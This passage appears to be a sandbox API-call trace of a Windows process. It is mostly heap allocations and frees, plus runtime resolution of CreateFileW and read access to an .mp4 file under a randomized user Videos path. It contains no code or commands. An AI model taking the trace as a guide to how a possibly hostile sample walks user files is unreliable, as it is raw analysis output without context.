[0104.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0104.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0104.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0104.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0104.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0104.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0104.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0104.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0104.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0104.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0104.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0104.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0104.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0104.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0104.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0104.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0104.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0104.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0104.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0104.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0104.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0104.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0104.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0104.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0104.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0104.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0104.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0104.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0104.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0104.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0104.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0104.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0104.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0104.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0104.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0104.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0104.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0104.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0104.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0104.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0104.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0104.642] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0104.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0104.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0104.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0104.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabf8 [0104.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cabf8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0104.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0104.643] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0104.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0104.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0104.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0104.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0104.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0104.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0104.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0104.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0104.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0104.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0104.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0104.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0104.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0104.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0104.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0104.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0104.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0104.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0104.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0104.644] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\38VodG.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\38vodg.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0104.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0104.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0104.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0104.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0104.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0104.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0104.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0104.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0104.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0104.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0104.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0104.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0104.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0104.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0104.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0104.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42da070 [0104.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0104.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0104.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0104.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0104.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0104.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0104.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0104.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0104.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0104.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0104.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0104.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0104.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0104.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0104.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0104.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0104.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0104.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0104.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0104.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0104.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0104.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0104.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0104.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0104.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0104.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0104.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0104.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0104.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0104.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0104.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0104.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0104.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0104.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0104.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0104.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0104.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0104.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0104.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0104.647] FreeLibrary (hLibModule=0x772d0000) returned 1 [0104.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0104.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0104.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0104.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0104.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0104.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0104.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0104.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0104.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0104.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0104.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0104.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0104.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0104.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0104.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0104.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0104.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0104.649] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0104.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0104.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0104.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0104.649] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0104.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0104.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0104.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0104.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0104.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0104.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0104.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0104.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0104.649] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0104.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0104.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0104.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0104.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0104.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0104.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0104.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0104.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0104.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0104.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0104.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0104.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0104.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0104.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0104.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0104.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0104.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0104.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0104.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0104.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42da070 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0104.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0104.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0104.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0104.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0104.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: 